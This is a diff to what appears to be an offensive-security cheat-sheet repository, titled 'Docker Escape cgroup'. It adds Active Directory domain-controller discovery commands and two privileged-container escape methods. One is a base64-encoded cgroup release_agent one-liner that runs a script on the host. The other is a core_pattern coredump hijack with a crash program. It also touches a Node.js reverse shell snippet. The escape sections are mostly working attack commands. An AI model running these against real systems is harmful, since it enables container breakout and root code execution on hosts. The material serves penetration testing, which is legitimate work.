Docker Escape cgroup

Methodology and Resources/Active Directory Attack.md

@@ -460,10 +460,15 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
 
 ### Other Interesting Commands
 
-- **Find Domain Controller**
+- **Find Domain Controllers**
   ```ps1
   nslookup domain.com
   nslookup -type=srv _ldap._tcp.dc._msdcs.<domain>.com
+  nltest /dclist:domain.com
+  Get-ADDomainController -filter * | Select-Object name
+  gpresult /r
+  $Env:LOGONSERVER 
+  echo %LOGONSERVER%
   ```
 
 ## Most common paths to AD compromise
@@ -3867,4 +3872,4 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html)
 * [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
 * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)
-* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)
+* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials)

Methodology and Resources/Container - Docker Pentest.md

@@ -9,6 +9,8 @@
 - [Open Docker API Port](#open-docker-api-port)
 - [Insecure Docker Registry](#insecure-docker-registry)
 - [Exploit privileged container abusing the Linux cgroup v1](#exploit-privileged-container-abusing-the-linux-cgroup-v1)
+    - [Abusing CAP_SYS_ADMIN capability](#abusing-capsysadmin-capability)
+    - [Abusing coredumps and core_pattern](#abusing-coredumps-and-corepattern)
 - [Breaking out of Docker via runC](#breaking-out-of-docker-via-runc)
 - [Breaking out of containers using a device file](#breaking-out-of-containers-using-a-device-file)
 - [References](#references)
@@ -137,6 +139,9 @@ Prerequisite (at least one):
  * `--privileged`
  * `--security-opt apparmor=unconfined --cap-add=SYS_ADMIN` flags.
 
+
+### Abusing CAP_SYS_ADMIN capability
+
 ```powershell
 docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash -c 'echo "cm5kX2Rpcj0kKGRhdGUgKyVzIHwgbWQ1c3VtIHwgaGVhZCAtYyAxMCkKbWtkaXIgL3RtcC9jZ3JwICYmIG1vdW50IC10IGNncm91cCAtbyByZG1hIGNncm91cCAvdG1wL2NncnAgJiYgbWtkaXIgL3RtcC9jZ3JwLyR7cm5kX2Rpcn0KZWNobyAxID4gL3RtcC9jZ3JwLyR7cm5kX2Rpcn0vbm90aWZ5X29uX3JlbGVhc2UKaG9zdF9wYXRoPWBzZWQgLW4gJ3MvLipccGVyZGlyPVwoW14sXSpcKS4qL1wxL3AnIC9ldGMvbXRhYmAKZWNobyAiJGhvc3RfcGF0aC9jbWQiID4gL3RtcC9jZ3JwL3JlbGVhc2VfYWdlbnQKY2F0ID4gL2NtZCA8PCBfRU5ECiMhL2Jpbi9zaApjYXQgPiAvcnVubWUuc2ggPDwgRU9GCnNsZWVwIDMwIApFT0YKc2ggL3J1bm1lLnNoICYKc2xlZXAgNQppZmNvbmZpZyBldGgwID4gIiR7aG9zdF9wYXRofS9vdXRwdXQiCmhvc3RuYW1lID4+ICIke2hvc3RfcGF0aH0vb3V0cHV0IgppZCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKcHMgYXh1IHwgZ3JlcCBydW5tZS5zaCA+PiAiJHtob3N0X3BhdGh9L291dHB1dCIKX0VORAoKIyMgTm93IHdlIHRyaWNrIHRoZSBkb2NrZXIgZGFlbW9uIHRvIGV4ZWN1dGUgdGhlIHNjcmlwdC4KY2htb2QgYSt4IC9jbWQKc2ggLWMgImVjaG8gXCRcJCA+IC90bXAvY2dycC8ke3JuZF9kaXJ9L2Nncm91cC5wcm9jcyIKIyMgV2FpaWlpaXQgZm9yIGl0Li4uCnNsZWVwIDYKY2F0IC9vdXRwdXQKZWNobyAi4oCiPygowq/CsMK3Ll8u4oCiIHByb2ZpdCEg4oCiLl8uwrfCsMKvKSnYn+KAoiIK" | base64 -d | bash -'
 ```
@@ -161,6 +166,31 @@ chmod a+x /cmd
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 ```
 
+### Abusing coredumps and core_pattern
+
+1. Find the mounting point using `mount`
+    ```ps1
+    $ mount | head -n 1
+    overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/YLH6C6EQMMG7DA2AL5DUANDHYJ:/var/lib/docker/overlay2/l/HP7XLDFT4ERSCYVHJ2WMZBG2YT,upperdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff,workdir=/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/work)
+    ```
+2. Create an evil binary at the root of the filesystem: `cp /tmp/poc /poc`
+3. Set the program to be executed on the coredumps
+    ```ps1
+    echo "|/var/lib/docker/overlay2/c51a87501842b287018d22e9d09d7d8dc4ede83a867f36ca199434d5ea5ac8f5/diff/poc" > /proc/sys/kernel/core_pattern
+    ```
+4. Generate a coredump with a faulty program: `gcc -o crash crash.c && ./crash`
+    ```cpp
+    int main(void) {
+        char buf[1];
+        for (int i = 0; i < 100; i++) {
+            buf[i] = 1;
+        }
+        return 0;
+    }
+    ```
+5. Your payload should have been executed on the host
+
+
 ## Breaking out of Docker via runC
 
 > The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to.  - Vulnerability overview by the runC team
@@ -216,4 +246,5 @@ The only caveat is that we cannot be sure that the container has `kmod` installe
 - [CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host - dragonsector.pl](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html)
 - [OWASP - Docker Security CheatSheet](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Docker_Security_Cheat_Sheet.md)
 - [Anatomy of a hack: Docker Registry - NotSoSecure - April 6, 2017](https://www.notsosecure.com/anatomy-of-a-hack-docker-registry/)
-- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping)
+- [Linux Kernel Hacking 3.8: Privileged Container Escapes - Harvey Phillips @xcellerator](https://github.com/xcellerator/linux_kernel_hacking/tree/master/3_RootkitTechniques/3.8_privileged_container_escaping)
+* [Escaping privileged containers for fun - 2022-03-06 :: Jordy Zomer](https://pwning.systems/posts/escaping-containers-for-fun/)

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket")
         sh.stdout.pipe(client);
         sh.stderr.pipe(client);
     });
-    return /a/; // Prevents the Node.js application form crashing
+    return /a/; // Prevents the Node.js application from crashing
 })();